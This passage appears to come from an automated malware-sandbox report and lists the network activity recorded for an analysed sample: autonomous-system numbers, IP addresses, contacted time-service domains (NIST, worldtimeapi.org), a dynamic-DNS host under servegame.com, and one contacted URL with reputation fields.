2895 FREE-NET-ASFREEnetEU false
208.76.221.217
 tgb5f522c40.servegame.com United States
62489 WCITUS false
132.163.97.3
 ntp1.glb.nist.gov United States
49 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS false

Contacted Domains

Name IP Active
ntp1.glb.nist.gov 132.163.97.3 true
worldtimeapi.org 213.188.196.246 true
tgb5f522c40.servegame.com 208.76.221.217 true
time.nist.gov unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://worldtimeapi.org/api/timezone/America/Sao_Paulo false
    		unknown